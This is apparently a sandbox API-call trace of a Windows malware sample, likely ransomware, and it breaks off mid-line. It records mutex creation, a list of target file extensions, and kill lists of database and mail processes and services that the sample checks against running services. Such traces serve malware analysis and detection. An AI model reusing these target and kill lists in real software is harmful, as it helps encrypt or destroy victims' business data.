# Flog Txt Version 1 # Analyzer Version: 3.0.2 # Analyzer Build Date: Jun 6 2019 12:21:16 # Log Creation Date: 07.07.2019 23:39:09.409 Process: id = "1" image_name = "ivttvf.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ivttvf.exe" page_root = "0x4cdc5000" os_pid = "0xa90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ivttvf.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0xa94 [0026.358] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76c20000 [0026.358] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0026.358] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleW") returned 0x76c334b0 [0026.359] GetProcAddress (hModule=0x76c20000, lpProcName="FindNextFileW") returned 0x76c354ee [0026.359] GetProcAddress (hModule=0x76c20000, lpProcName="FindClose") returned 0x76c34442 [0026.359] GetProcAddress (hModule=0x76c20000, lpProcName="MoveFileW") returned 0x76c49af0 [0026.359] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileSizeEx") returned 0x76c359e2 [0026.359] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameW") returned 0x76c34950 [0026.359] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileAttributesW") returned 0x76c31b18 [0026.359] GetProcAddress (hModule=0x76c20000, lpProcName="ExitProcess") returned 0x76c37a10 [0026.359] GetProcAddress (hModule=0x76c20000, lpProcName="GetCommandLineW") returned 0x76c35223 [0026.359] GetProcAddress (hModule=0x76c20000, lpProcName="GetComputerNameW") returned 0x76c3dd0e [0026.359] GetProcAddress (hModule=0x76c20000, lpProcName="GetComputerNameA") returned 0x76c4b6e0 [0026.359] GetProcAddress (hModule=0x76c20000, lpProcName="CreateMutexW") returned 0x76c3424c [0026.359] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenW") returned 0x76c31700 [0026.359] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0026.359] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcess") returned 0x76c31809 [0026.359] GetProcAddress (hModule=0x76c20000, lpProcName="WaitForSingleObject") returned 0x76c31136 [0026.359] GetProcAddress (hModule=0x76c20000, lpProcName="GetLogicalDrives") returned 0x76c35371 [0026.359] GetProcAddress (hModule=0x76c20000, lpProcName="GetTickCount") returned 0x76c3110c [0026.359] GetProcAddress (hModule=0x76c20000, lpProcName="DeleteFileW") returned 0x76c389b3 [0026.359] GetProcAddress (hModule=0x76c20000, lpProcName="WideCharToMultiByte") returned 0x76c3170d [0026.359] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76c31916 [0026.359] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0026.359] GetProcAddress (hModule=0x76c20000, lpProcName="LeaveCriticalSection") returned 0x77152270 [0026.360] GetProcAddress (hModule=0x76c20000, lpProcName="ReadFile") returned 0x76c33ed3 [0026.360] GetProcAddress (hModule=0x76c20000, lpProcName="CreateFileW") returned 0x76c33f5c [0026.360] GetProcAddress (hModule=0x76c20000, lpProcName="OpenMutexW") returned 0x76c35151 [0026.360] GetProcAddress (hModule=0x76c20000, lpProcName="EnterCriticalSection") returned 0x771522b0 [0026.360] GetProcAddress (hModule=0x76c20000, lpProcName="WaitForMultipleObjects") returned 0x76c34220 [0026.360] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpiW") returned 0x76c4d5cd [0026.360] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpiA") returned 0x76c33e8e [0026.360] GetProcAddress (hModule=0x76c20000, lpProcName="DeleteCriticalSection") returned 0x771645f5 [0026.360] GetProcAddress (hModule=0x76c20000, lpProcName="ReleaseMutex") returned 0x76c3111e [0026.360] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0026.360] GetProcAddress (hModule=0x76c20000, lpProcName="GetVersion") returned 0x76c34467 [0026.360] GetProcAddress (hModule=0x76c20000, lpProcName="CreateThread") returned 0x76c334d5 [0026.360] GetProcAddress (hModule=0x76c20000, lpProcName="ExpandEnvironmentStringsW") returned 0x76c34173 [0026.360] GetProcAddress (hModule=0x76c20000, lpProcName="QueryPerformanceCounter") returned 0x76c31725 [0026.360] GetProcAddress (hModule=0x76c20000, lpProcName="QueryPerformanceFrequency") returned 0x76c341f0 [0026.360] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0026.360] GetProcAddress (hModule=0x76c20000, lpProcName="SetFileAttributesW") returned 0x76c4d4f7 [0026.360] GetProcAddress (hModule=0x76c20000, lpProcName="GetVolumeInformationW") returned 0x76c4c860 [0026.360] GetProcAddress (hModule=0x76c20000, lpProcName="WriteFile") returned 0x76c31282 [0026.360] GetProcAddress (hModule=0x76c20000, lpProcName="SetFilePointerEx") returned 0x76c4c807 [0026.360] GetProcAddress (hModule=0x76c20000, lpProcName="SetEndOfFile") returned 0x76c4ce2e [0026.360] GetProcAddress (hModule=0x76c20000, lpProcName="FindFirstFileW") returned 0x76c34435 [0026.360] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0026.361] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0026.361] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0026.361] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0026.361] GetProcAddress (hModule=0x76c20000, lpProcName="CreatePipe") returned 0x76cb415b [0026.361] GetProcAddress (hModule=0x76c20000, lpProcName="SetHandleInformation") returned 0x76c4195c [0026.361] GetProcAddress (hModule=0x76c20000, lpProcName="CreateProcessW") returned 0x76c3103d [0026.361] GetProcAddress (hModule=0x76c20000, lpProcName="CompareStringW") returned 0x76c33bca [0026.361] GetProcAddress (hModule=0x76c20000, lpProcName="CompareStringA") returned 0x76c33c5a [0026.361] GetProcAddress (hModule=0x76c20000, lpProcName="OpenProcess") returned 0x76c31986 [0026.361] GetProcAddress (hModule=0x76c20000, lpProcName="TerminateProcess") returned 0x76c4d802 [0026.361] GetProcAddress (hModule=0x76c20000, lpProcName="GetSystemTime") returned 0x76c35a96 [0026.361] GetProcAddress (hModule=0x76c20000, lpProcName="SystemTimeToFileTime") returned 0x76c35a7e [0026.361] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0026.361] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0026.361] GetProcAddress (hModule=0x76c20000, lpProcName="Process32NextW") returned 0x76c5896c [0026.361] GetProcAddress (hModule=0x76c20000, lpProcName="Process32FirstW") returned 0x76c58baf [0026.361] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x74d40000 [0027.734] GetProcAddress (hModule=0x74d40000, lpProcName="RegOpenKeyExW") returned 0x74d5468d [0027.734] GetProcAddress (hModule=0x74d40000, lpProcName="RegQueryValueExW") returned 0x74d546ad [0027.734] GetProcAddress (hModule=0x74d40000, lpProcName="RegSetValueExW") returned 0x74d514d6 [0027.735] GetProcAddress (hModule=0x74d40000, lpProcName="RegCloseKey") returned 0x74d5469d [0027.735] GetProcAddress (hModule=0x74d40000, lpProcName="OpenProcessToken") returned 0x74d54304 [0027.735] GetProcAddress (hModule=0x74d40000, lpProcName="GetTokenInformation") returned 0x74d5431c [0027.735] GetProcAddress (hModule=0x74d40000, lpProcName="OpenSCManagerW") returned 0x74d4ca64 [0027.735] GetProcAddress (hModule=0x74d40000, lpProcName="OpenServiceW") returned 0x74d4ca4c [0027.735] GetProcAddress (hModule=0x74d40000, lpProcName="CloseServiceHandle") returned 0x74d5369c [0027.735] GetProcAddress (hModule=0x74d40000, lpProcName="ControlService") returned 0x74d67144 [0027.735] GetProcAddress (hModule=0x74d40000, lpProcName="QueryServiceStatus") returned 0x74d52a86 [0027.735] GetProcAddress (hModule=0x74d40000, lpProcName="EnumDependentServicesW") returned 0x74d41e3a [0027.735] GetProcAddress (hModule=0x74d40000, lpProcName="EnumServicesStatusExW") returned 0x74d4b466 [0027.735] LoadLibraryA (lpLibFileName="user32.dll") returned 0x74f40000 [0028.614] GetProcAddress (hModule=0x74f40000, lpProcName="SystemParametersInfoW") returned 0x74f590d3 [0028.614] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0030.464] GetProcAddress (hModule=0x75fd0000, lpProcName="ShellExecuteExW") returned 0x75ff1e46 [0030.465] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0030.465] GetProcAddress (hModule=0x77130000, lpProcName="NtQuerySystemInformation") returned 0x7714fda0 [0030.465] LoadLibraryA (lpLibFileName="mpr.dll") returned 0x74b50000 [0030.553] GetProcAddress (hModule=0x74b50000, lpProcName="WNetCloseEnum") returned 0x74b52dd6 [0030.553] GetProcAddress (hModule=0x74b50000, lpProcName="WNetOpenEnumW") returned 0x74b52f06 [0030.553] GetProcAddress (hModule=0x74b50000, lpProcName="WNetEnumResourceW") returned 0x74b53058 [0030.553] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x75bc0000 [0030.723] GetProcAddress (hModule=0x75bc0000, lpProcName="WSAStartup") returned 0x75bc3ab2 [0030.724] GetProcAddress (hModule=0x75bc0000, lpProcName="socket") returned 0x75bc3eb8 [0030.724] GetProcAddress (hModule=0x75bc0000, lpProcName="send") returned 0x75bc6f01 [0030.724] GetProcAddress (hModule=0x75bc0000, lpProcName="recv") returned 0x75bc6b0e [0030.724] GetProcAddress (hModule=0x75bc0000, lpProcName="connect") returned 0x75bc6bdd [0030.724] GetProcAddress (hModule=0x75bc0000, lpProcName="closesocket") returned 0x75bc3918 [0030.724] GetProcAddress (hModule=0x75bc0000, lpProcName="gethostbyname") returned 0x75bd7673 [0030.724] GetProcAddress (hModule=0x75bc0000, lpProcName="inet_addr") returned 0x75bc311b [0030.724] GetProcAddress (hModule=0x75bc0000, lpProcName="ntohl") returned 0x75bc2d57 [0030.724] GetProcAddress (hModule=0x75bc0000, lpProcName="htonl") returned 0x75bc2d57 [0030.724] GetProcAddress (hModule=0x75bc0000, lpProcName="htons") returned 0x75bc2d8b [0030.724] GetProcessHeap () returned 0x570000 [0030.725] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5840c8 [0030.725] QueryPerformanceCounter (in: lpPerformanceCount=0x18fdb8 | out: lpPerformanceCount=0x18fdb8*=15091516722) returned 1 [0030.725] GetTickCount () returned 0x18055 [0030.725] GetCurrentProcessId () returned 0xa90 [0030.725] GetTickCount () returned 0x18055 [0030.725] GetTickCount () returned 0x18055 [0030.725] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5840f0 [0030.726] GetVersion () returned 0x1db10106 [0030.726] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x7) returned 0x5736b0 [0030.726] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x580bd0 [0030.726] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x580bd0, Size=0x20) returned 0x584140 [0030.726] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x584140, Size=0x40) returned 0x5846b0 [0030.726] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x584900 [0030.726] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_5M390TA") returned 0x0 [0030.726] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\syncronize_5M390TA") returned 0x84 [0030.726] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5736b0 | out: hHeap=0x570000) returned 1 [0030.726] lstrlenW (lpString="Global\\syncronize_") returned 18 [0030.726] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5846b0 | out: hHeap=0x570000) returned 1 [0030.726] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x7) returned 0x5736b0 [0030.726] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x580bd0 [0030.726] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x580bd0, Size=0x20) returned 0x584140 [0030.726] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x584140, Size=0x40) returned 0x5846b0 [0030.726] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x594908 [0030.727] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_5M390TU") returned 0x0 [0030.727] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\syncronize_5M390TU") returned 0x88 [0030.727] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5736b0 | out: hHeap=0x570000) returned 1 [0030.727] lstrlenW (lpString="Global\\syncronize_") returned 18 [0030.727] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5846b0 | out: hHeap=0x570000) returned 1 [0030.727] GetVersion () returned 0x1db10106 [0030.727] GetCurrentProcess () returned 0xffffffff [0030.727] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18fda4 | out: TokenHandle=0x18fda4*=0x8c) returned 1 [0030.727] GetTokenInformation (in: TokenHandle=0x8c, TokenInformationClass=0x14, TokenInformation=0x18fda0, TokenInformationLength=0x4, ReturnLength=0x18fdac | out: TokenInformation=0x18fda0, ReturnLength=0x18fdac) returned 1 [0030.727] CloseHandle (hObject=0x8c) returned 1 [0030.727] WaitForSingleObject (hHandle=0x88, dwMilliseconds=0x0) returned 0x0 [0030.727] WaitForSingleObject (hHandle=0x84, dwMilliseconds=0x3e8) returned 0x0 [0030.727] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x14) returned 0x5736b0 [0030.727] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x580bd0 [0030.727] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x580bd0, Size=0x20) returned 0x584140 [0030.727] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x584140, Size=0x40) returned 0x5846b0 [0030.727] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5846b0, Size=0x80) returned 0x5846b0 [0030.727] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5846b0, Size=0x100) returned 0x5846b0 [0030.727] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x34) returned 0x5847b8 [0030.727] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x4) returned 0x5807c0 [0030.727] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x4) returned 0x5807d0 [0030.727] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8) returned 0x5807e0 [0030.727] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x580bd0 [0030.727] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x4) returned 0x5847f8 [0030.727] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x580be8 [0030.727] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5847f8, Size=0x8) returned 0x5847f8 [0030.727] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x580c00 [0030.728] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5847f8, Size=0x10) returned 0x5847f8 [0030.728] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x580c18 [0030.728] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x580c30 [0030.728] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5847f8, Size=0x20) returned 0x5847f8 [0030.728] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x580c48 [0030.728] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x580c60 [0030.728] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5807c0, Size=0x8) returned 0x5807c0 [0030.728] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5807d0, Size=0x8) returned 0x5807d0 [0030.728] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8) returned 0x584820 [0030.728] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x580c78 [0030.728] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x4) returned 0x584830 [0030.728] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x580c90 [0030.728] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x584830, Size=0x8) returned 0x584830 [0030.728] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a4928 [0030.728] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x584830, Size=0x10) returned 0x584830 [0030.728] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a4940 [0030.728] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8) returned 0x584848 [0030.728] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x584830, Size=0x20) returned 0x584858 [0030.728] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5807c0, Size=0x10) returned 0x584830 [0030.728] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5807d0, Size=0x10) returned 0x584880 [0030.728] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8) returned 0x5807c0 [0030.728] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x5a4958 [0030.728] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x4) returned 0x5807d0 [0030.728] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a4970 [0030.728] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5807d0, Size=0x8) returned 0x5807d0 [0030.728] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8) returned 0x584898 [0030.728] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x5a4988 [0030.728] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x4) returned 0x5848a8 [0030.728] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a49a0 [0030.728] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5848a8, Size=0x8) returned 0x5848a8 [0030.728] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x584830, Size=0x20) returned 0x5a4d10 [0030.728] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x584880, Size=0x20) returned 0x5a4d38 [0030.728] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8) returned 0x584880 [0030.728] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x5a49b8 [0030.728] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x4) returned 0x584830 [0030.728] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a49d0 [0030.728] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x584830, Size=0x8) returned 0x584830 [0030.728] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x14) returned 0x5a4d60 [0030.728] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x14) returned 0x5a4d80 [0030.728] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91 [0030.728] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5846b0 | out: hHeap=0x570000) returned 1 [0030.729] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x18fdf0 | out: lpWSAData=0x18fdf0) returned 0 [0030.737] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5a49e8 [0030.737] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a49e8, Size=0x20) returned 0x584348 [0030.737] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x584348, Size=0x40) returned 0x584708 [0030.737] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x584708, Size=0x80) returned 0x584708 [0030.737] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x584708, Size=0x100) returned 0x5a5058 [0030.737] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5a49e8 [0030.737] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a49e8, Size=0x20) returned 0x584348 [0030.737] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x584348, Size=0x40) returned 0x584708 [0030.737] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x584708, Size=0x80) returned 0x584708 [0030.737] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x584708, Size=0x100) returned 0x5a5160 [0030.737] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x5a49e8 [0030.737] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x4) returned 0x584708 [0030.737] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5a4a00 [0030.737] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x584708, Size=0x8) returned 0x584708 [0030.737] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x14) returned 0x584718 [0030.737] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x584708, Size=0x10) returned 0x584738 [0030.737] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x18) returned 0x584750 [0030.737] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1a) returned 0x584348 [0030.737] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x584738, Size=0x20) returned 0x584770 [0030.737] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1c) returned 0x584370 [0030.737] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x16) returned 0x584798 [0030.737] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1a) returned 0x584398 [0030.738] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x5a4a18 [0030.738] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x4) returned 0x584708 [0030.738] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40) returned 0x5a5268 [0030.738] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x584708, Size=0x8) returned 0x584708 [0030.738] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x3c) returned 0x5a52b0 [0030.738] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x584708, Size=0x10) returned 0x584738 [0030.738] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x14) returned 0x5a52f8 [0030.738] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x18) returned 0x5a5318 [0030.738] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x584738, Size=0x20) returned 0x5a5338 [0030.738] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x24) returned 0x5a5360 [0030.738] lstrlenW (lpString="1c8.exe;1cv77.exe;outlook.exe;postgres.exe;mysqld-nt.exe;mysqld.exe;sqlservr.exe;") returned 81 [0030.738] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a5058 | out: hHeap=0x570000) returned 1 [0030.738] lstrlenW (lpString="FirebirdGuardianDefaultInstance;FirebirdServerDefaultInstance;sqlwriter;mssqlserver;sqlserveradhelper;") returned 102 [0030.738] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a5160 | out: hHeap=0x570000) returned 1 [0030.738] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x5a58e0 [0030.742] EnumServicesStatusExW (in: hSCManager=0x5a58e0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x18fd8c, lpServicesReturned=0x18fda4, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x18fd8c, lpServicesReturned=0x18fda4, lpResumeHandle=0x0) returned 0 [0030.743] GetLastError () returned 0xea [0030.743] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x11e4) returned 0x5a91e0 [0030.743] EnumServicesStatusExW (in: hSCManager=0x5a58e0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x5a91e0, cbBufSize=0x11e4, pcbBytesNeeded=0x18fd8c, lpServicesReturned=0x18fda4, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x5a91e0, pcbBytesNeeded=0x18fd8c, lpServicesReturned=0x18fda4, lpResumeHandle=0x0) returned 1 [0030.744] CloseServiceHandle (hSCObject=0x5a58e0) returned 1 [0030.746] lstrlenW (lpString="Appinfo") returned 7 [0030.746] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0030.746] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0030.746] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0030.746] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0030.746] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0030.746] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0030.746] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0030.746] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0030.746] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0030.746] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0030.746] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0030.746] lstrlenW (lpString="AudioSrv") returned 8 [0030.746] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0030.746] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0030.746] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0030.746] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0030.746] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0030.746] lstrlenW (lpString="BFE") returned 3 [0030.746] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0030.746] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0030.746] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0030.747] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0030.747] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0030.747] lstrlenW (lpString="CryptSvc") returned 8 [0030.747] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0030.747] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0030.747] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0030.747] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0030.747] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0030.747] lstrlenW (lpString="CscService") returned 10 [0030.747] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0030.747] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0030.747] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0030.747] lstrcmpiW (lpString1="mssqlserver", 